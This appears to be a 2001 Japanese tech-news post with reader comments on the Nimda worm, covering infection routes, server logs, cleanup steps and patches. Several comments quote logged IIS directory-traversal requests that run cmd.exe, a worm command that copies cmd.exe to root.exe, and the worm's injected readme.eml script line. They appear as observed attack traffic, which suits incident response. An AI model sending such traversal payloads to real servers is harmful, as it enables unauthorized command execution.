かなりヤバイワーム、W32.Nimda.A@mm 76
ワーム大盛りってカンジか 部門より
今日、あちこちのMLを騒がせているアタックについて、多くのタレコミが寄せられている。
HIRONOBU_SUZUKI 曰く,"今朝のファイアウォール・ログ解析ツールからの報告によると、昨日の夜8時(日本時間)からかなりHTTPDへのスキャンが激増していました。
実際にHTTPDのログを見ると... こりゃ、相当ヤバイじゃないですか。IISの持つ色々な脆弱性を片っ端からスキャンしています。 CERT/CCの最新の報告を見ると 既にこのアクティビティは認識されているようです。さらにREADME.EXEなんていう変なメールが来ているので、ウィルスチェッカーのベンダ記録をみると 新種の nimdaワーム なんてのが。最近、僕が「ハイブリッド方式」と呼んでいる感染経路と攻撃経路を分離させている方式の一種でさらに感染経路まで複数持つというやっかいなタイプです。今回はIISとOutlookの組み合わせで、 かなり厄介です。"
また、MSNにも被害が出ている。ryouki 曰く,"今朝方 msn.co.jp が見れなくなっていたのだが、その原因は新種のワームである事が判明、msn.co.jp からの注意喚起と謝罪の記事が出た。これは何かと言うと、 w32/minda@mm 。nai / symantec
重要なお知らせと謝罪がさらっと出たのはそれなりに評価。でもその割にはアンカーが全く目立たない....> msn.co.jp top"
しかも、親切を仇で返された人 曰く,"9/18 22:00(日本時間)より、IISのバックドアを狙ったと思われるアタックロボットが多数活動している。これぐらいならまだ良いのですが(良いわけじゃないけど)、当然LOGをみてそのサーバの管理を行っているところに警告を送ろうかなとそこのWebPageをIEでみようとすると、mhtmlを使用して、readme.exeを送信され、さらにLocalファイルとして実行され、さらに、これがウィルスだったりする(windows\system\の下にload.exeとriched20.dllなるファイルがつくられ常駐するタイプ。htmファイルなどから*.emlファイルを多量に作成。system.iniとレジストリを書き換えてどちらか一方が残っていると、定期的にもう一つを補完するという)ので、ちょっとした親切心を起こしたことが、仇になる可能性が・・・・。 アタックサイトのチェックにはIEを使わないことがおすすめです。"
嫌なやつが現れた。とりあえず、サーバ側の対策はこちら、恩を仇で返されないためのクライアント側の対策はこちらなので、不安な人はそれらをチェックのこと。
現在、手動で駆逐中です (スコア:5, 参考になる)
解析中なので詳細は省きますが、
・まずパッチを当てる(MS00-078のやつ)
・56Kbyteぐらいの大きさのmmc.exeを見つけて、実行権を消す。
・NET.EXE 、NET1.EXE をリネームしておく。
・ディスク上にあるすべての「readme.eml」ファイルを削除する。
・ディスク上にあるすべてのhtmlファイルを調べて、
window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
という文字列を含む行があったら消す。
という対処で今のところ逃げてます(これで対策OKというわけではないです)。ご参考までに。
この手順はマズイ!という情報をお持ちでしたら、レスポンスください>苦労されている方々
Apache の人は (スコア:5, 参考になる)
うちでは、6000hit/時間 来てます。
昨夜からの14時間の総計ですでに 7万 …。
Apache の人は直接被害無いですが httpd.conf に以下のようにすることでログが分割できます。
SetEnvIf Request_URI "default\.ida" warmlog
SetEnvIf Request_URI "cmd\.exe" warmlog
SetEnvIf Request_URI "root\.exe" warmlog
SetEnvIf Request_URI "Admin\.dll" warmlog
CustomLog logs/worm_log combined env=warmlog
CustomLog logs/access_log combined env=!warmlog
ErrorLog logs/error_log
ファイアウォール・ログ解析ツール (スコア:4, 参考になる)
すずきひろのぶ
いっそのこと (スコア:4, おもしろおかしい)
#最近のウイルス・ワームにはエレガントが足りない
char *A;
モータースポーツ部 [slashdot.jp]
スコア:-1, 余計なもの (スコア:4, すばらしい洞察)
今回のInternetExplorer6日本語版リリースキャンペーンはいかがだったかな?
みんなはやくアップグレードしようぜ!!
さっそく捕獲してます (スコア:3, 参考になる)
私はセキュリティホールmemoのMLで見て、確認して気付きました。ということで記事の内容を読んだ上で、感染源となってるreadme.emlを捕獲しました。
私の日記からたどれますが、よーく注意してアクセスしてください。
-- やさいはけんこうにいちば〜ん!
Re:現在、手動で駆逐中です (スコア:3, 参考になる)
・MS00-78だけじゃダメ。IISのセキュリティパッチをかたっぱしから当てないと防げないみたい。
・root.exeファイルを見つけたら、削除する。
・余計なファイル共有をOFFる。
とりいそぎ。
Re:CERT Advisory発行 (スコア:3, 参考になる)
ここ経由でこちらです。
#すでに社内でも感染済み(;_;)
Re:現在、手動で駆逐中です (スコア:3, 参考になる)
ACさんと同じように、MS00-078パッチを当てたはずのサーバがやられたので、00078だけじゃダメなのかなぁと思ったのです。でも、攻撃パターンは00078の適用で回避できるタイプのものなんですよね。
で、「おそらく」なんですが、
1.以前、「copy c:\winnt\system32\cmd.exe inetpub\scripts\root.exe」というコマンドをなんらかのワームに実行されてしまった。
2.このワームに対するパッチを適用した。root.exeはそのまま残ってる。
3.シェルコマンドをやりたい放題に実行可能!
っていう状況のサーバだったんではないかと思います。root.exeというファイルが、サーバに入っていたら要注意ですね。サーバに残っていたログを見る限り、UNICODEアタックの前に、root.exeが実行可能かどうかを調べているようなので、このワーム以前に流行した何らかのワーム(あるいはウイルス)にヤラレて、root.exeが残ったままの状況を想定して作られたワームなんじゃないかと思います。
Re:いっそのこと (スコア:3, すばらしい洞察)
このワームって何もしないんですか? (スコア:2)
空いたサイトのIPをどっかに集めるとか。
May the 4th B w/z U
CERT Advisory発行 (スコア:2, 参考になる)
ついさっき、CERT/CCがAdvisoryを発行しました。CA-2001-26です。
Re:現在、手動で駆逐中です (スコア:2)
・admin.dllという名前のファイルが、あちこちに散らばっているはずなので、これも消します。ただ、消してはいけないadmin.dllも(私が見た環境には)あったので、他のadmin.dllとファイルを比較して、必要そうであれば残しておきます。
私が挙げた9つの手順で、当方では沈静化してます。ただ、Explorerの挙動が不安定なので、根本的な対策にはなっていないようです(レジストリも荒らされてましたが、どう直したらいいのかわからん)。あとは、その道のプロの対策法を待つことにします。
IRC&FTP (スコア:2, 参考になる)
IRCやFTPも使う可能性があるとのことです。
(各種MLとか見てる限りではまだそういう話は聞きませんので、
ホントかどうか分かりませんけど)
しかし、なにやら今迄のとは違い、随分用意周到ですよね。
Re:これものすごいですね (スコア:2)
ログを見ると、/scripts/だけでなく、
GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 249
GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 249
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../w
innt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
のようなリクエストがいろいろ来てますね。リクエスト同士の間隔は1~2秒
おきくらいでした。
- Ryuzi Kambe -
過去を振り返って (スコア:2)
観測出来そう。analogやwebalizerのようなアクセスログ解析ツールに、
「観測されたワーム」のようなセクションが追加されないかな。
- Ryuzi Kambe -
新種ウイルス「W32/Nimda(仮称)」に関する情報 (スコア:2, 参考になる)
http://www.ipa.go.jp/security/topics/newvirus/nimda.html
わかってない人たち(Re:対策ソフト?) (スコア:2, おもしろおかしい)
あったまわるーい・・・。
とくにこのへん↓
対処方法…でもなんか不足してるような… (スコア:2)
シマンテックの英語のページに対処方法が掲載されたようです。
でも、必要なDLLやEXEが上書きされてたらこれだけでは復旧できないので結局再インストールが必要な気もします
wakatono
Re:MSNって謝罪してるの? (スコア:2)
Re:IIS はないのですが (スコア:2, 参考になる)
IEはもちろんIISも腐るほどありまして・・・
> そして本社の admin はワクチンの取り処はアナウンスするんだけど、
> q290108 の在り処はアナウンスしない方々でして。凸(-_-#
アナウンスする前にExchageが倒れまして・・・
私は有給使っているので関係ありませんでしたが、
今日一日社内大変だったようです。
なんでも、社内LAN自体使用不可になったり、
メールサーバが落ちまくったようでして。
> # そこまでして漏ーたす悩ーつを使わせたい? > 本社 admin さま
うちの会社の場合ExchangeなんでクライアントはOutlook・・・。
いいかげんやめようよ、ほんとに。
> # 社内アーカイブの IE を SP1 のまま放っておくような
> # 陰湿なまねはせずに「IE は禁止」の方が素直だろうに。
Win2KはSP1のアナウンスがあったきりでSP2は全くなし。
IEにいたっては一切アナウンスなし。
これでも一応SIベンダなんですけど(涙)。
# 辞めるから関係ないか。
テロとウイルスの関連性 (スコア:2, おもしろおかしい)
何でもかんでもトップニュースと結びつける
日本のワイドショー体制の構造改革も総理には
是非お願いしたいと思う次第です(^^)
それはさておき、安易に不安感を煽るのは良くないですねぇ。
あれ見た人たちでパソコン恐怖症になった人はどれくらい
居たんでしょうか・・。
あんな中途半端な言い方ではウイルスそのものの実害よりも、
自分のパソコンがテロリストに破壊されるってイメージが
強くなってしまうぢゃ無いですか・・。
-- non --
やられたあるよ (スコア:2)
昨日(9/19)は昼頃からネットワークの動作が遅くなり始め、午後1時すぎにはWebが全く見れなくなってしまい、それで/.も見れませんでした。
メールサーバは動いていたが、途中の中継が詰まっているらしく、受信も送信もとても遅くなっていました。
社内の伝票処理も全てネット上でおこなっているので、午後は仕事が一部中断したままになってしまった模様。
今日(9/20)朝には復旧していましたから、システム部門の方々は夜中さぞ大変だっただろうと察します。
私のWindows98マシンは感染していませんでしたが、社内のあちこちで発病していたと推定されます。
iModeはどうなる? (スコア:2)
iMODEのシステムがどうなっているかは知らないからトンチンカンなことを考えているのかもしれないが、実際のところはどうなっているのかだれか教えてくれ。
char *A;
モータースポーツ部 [slashdot.jp]
Re:iModeはどうなる? (スコア:2)
Nimda II で対応予定です。とかだったらいやすぎ。
未知ウィルス検出機能 (スコア:2)
各社自慢の未知ウィルス検出機能は、どの程度役に立ったんでしょうか?
Re:iModeはどうなる? (スコア:2)
ということだ。
char *A;
モータースポーツ部 [slashdot.jp]
感染してしまったPE_NIMDA.Aの駆除/修復ツール (スコア:2)
Re:未知ウィルス検出機能 (スコア:2)
その技術投入直後には、Windows 標準コンポーネントがひっかかりまくってましたし。
IE が引っかかったのが、あながちまちがいではないという話もあった :-p
Re:さっそく捕獲してます (スコア:1)
lynx -dump -source http://fuga.jp/data/readme.eml.txt > hoge.txt
とすれば怖くないかも。
これものすごいですね (スコア:1)
以下のような感じで、毎秒に近いかんじでアクセス
されています。ネットワーク負荷が心配です。
もう疲れました。^_^;;
210.221.142.67 - - [19/Sep/2001:04:22:37 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
210.221.142.67 - - [19/Sep/2001:04:22:39 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
210.221.142.67 - - [19/Sep/2001:04:22:39 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
210.221.142.67 - - [19/Sep/2001:04:22:39 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
210.221.142.67 - - [19/Sep/2001:04:22:39 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304
210.221.142.67 - - [19/Sep/2001:04:22:39 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
210.221.142.67 - - [19/Sep/2001:04:22:40 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
210.221.142.67 - - [19/Sep/2001:04:22:40 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
正直、やられたっ (スコア:1)
しまいました。遅咲きCode Redかと
思ってたんですが…
2台ヤラれた模様…とりあえずLANから切り離しました。
# 片方は外に繋がってないマシンだったのに…
Re:正直、やられたっ (スコア:1, 参考になる)
感染したIISのサイトにアクセスするだけでクライアントにも感染します。
そして、クライアント感染した場合はメールでも広まります。
なので、外に繋がって無くても内部でクライアント感染してる人がいるのでわないかと・・・。
IE5、IE5.5 のそれぞれ SP1 以前だと感染するようです。
SP2、若しくは IE6 にしましょう。
Internet Explorer 5.01 Service Pack 2 のダウンロードページ
http://www.microsoft.com/downloads/release.asp?ReleaseID=28910
Internet Explorer 5.5Service Pack 2 のダウンロードページ
http://www.microsoft.com/downloads/release.asp?releaseid=32082
IE6日本語版らしきもの
http://download.microsoft.com/download/IE60/fnlrtw/ie6/W98NT42KMe/JA/ie6setup.exe
Re:あたたかい (スコア:1)
全パッチをあてても感染、、? (スコア:1)
「パッチは全てあてている」
とか言われましたが、、
それが本当なら、、ん~、、
Re:全パッチをあてても感染、、? (スコア:1)
サーバ用のパッチが全部適用されていても
ブラウザが腐っていればどうしようもないですな。
#それでもIE使用しているが...
「パッチをあてている」=「サービスパックをインストールしたから大丈夫のはず」
っていうのが結構多いです。
農水省や毎日新聞なども感染 (スコア:1)
【strawberry:)】
銀行もだって (スコア:1)
【strawberry:)】
Re:IRC&FTP (スコア:1)
おりましたのでご参考に。
[connect24h:04684]
どうやらコードをどっかのホストからftpでダウンロードさせて
そいつを実行させることで感染させちゃおうってことですね。
これ、感染したサーバにftpdを立てるってことなんだろうか?
IRCの方は依然として情報ないけど
zdnn記事中の「IRC経由で広がるかも」ってどういうことかな?
Re:全パッチをあてても感染、、? (スコア:1)
このパターンはウイルススキャンの出番なのかな。
追加でこんなのどう? (スコア:1)
駆除に必要な物を揃えるのは、(できるだけ)感染してないマシンでそろえる。
あと、ワクチンのデータにも注意。
それぞれのメーカの情報をよく読んで、どのバージョンから対応しているか確認。
感染してないと思っても、じつはデータが古かったって落ちもあります。
例えば、NAIだと、
対応は4159から。
最新のZIPは、4160
でも、インストール用のEXEがついてるのや、
エンジンのついたSDATは、4158といった未対応の古いままでした。
シマンテックやトレンドマイクロも、なんかドタバタしててます。
今週いっぱいは、ダウンロードした物が対応したバージョンか確認する事をお勧めします。
Re:IRC&FTP (スコア:1)
このMLでの説明は、CodeRedIIなどが仕掛けたバックドアを使って tftp で本体を GET させているものなので、ちょっと違うかと。
まだどのように FTP を使うのかわかっていませんが、 Nimda にFTPエンジンがついているということですよね。
へたすると、ローカルにある Frontpage などのHTMLを改ざんして、それをサーバに送り込むのかも。
考えすぎであって欲しいけど、もしそうだったらApacheで公開しているページも危ないかも。
Re:MSNって謝罪してるの? (スコア:1)
と主張しているだけのように思われます(それが質問者の求めていた回答であるかどうかはともかく)。 まさか危険なファイルをダウンロードさせるようなスクリプトを含むページを公開することが 「攻撃」にあたらないとまでは言わないでしょう。
ふと思ったのですが,
を四角四面に受け取っておくのも一興かと。
IIS はないのですが (スコア:1)
そして本社の admin はワクチンの取り処はアナウンスするんだけど、 q290108 の在り処はアナウンスしない方々でして。凸(-_-#
# そこまでして漏ーたす悩ーつを使わせたい? > 本社 admin さま
# 社内アーカイブの IE を SP1 のまま放っておくような
# 陰湿なまねはせずに「IE は禁止」の方が素直だろうに。
無駄無駄無駄!(某氏風) (スコア:1)
IEを禁止してても、勝手に入れて使うユーザーに、入れてるのを隠してばら撒く導入部門。
禁止しても、敵は強大です。
こんな時が来るのわかってたから禁止してるのにねぇ(TT)
ワクチンは3段構えで構成してましたが、全部破られました。
全て別メーカーにしておきましたが、どれも玉砕とは。
明日には防御体制が整うが、後始末は・・・破った連中にさせよう。
Re:いっそのこと (スコア:1)
cron あたりで apt-get update; apt-get upgrade するようになっていれ
ば...
うーん (スコア:1)
これも一つの戦争なんでしょう.
少なくとも今の時点で,
本当に適切な対処と言うものが,
なさそうなこと,も怖い.
CodeRed系で,戦略の妥当性を検証して,
今回ので,戦術の妥当性を検証して,
近い数日中に,次は,実戦が...
なんて杞憂だといいのですが.
-- LightSpeed-J
Re:いっそのこと (スコア:1)
君のマシンにはどの穴から侵入したか、とか感染経路なんてのをログに書いてくれてたりするとすごいですけどね。
何にしてもウイルス反対ですけど。
FTPはWindows付属かと (スコア:1)
CodeRedIIのバックドアを叩く時は、最初はコンソールしかないんで、バイナリを落として実行するのでは。
このワームが教えてくれたこと (スコア:1)
こいつの攻撃手段って、全部、既知のものなんだもんねぇ。
保険料の値上げは当然だな。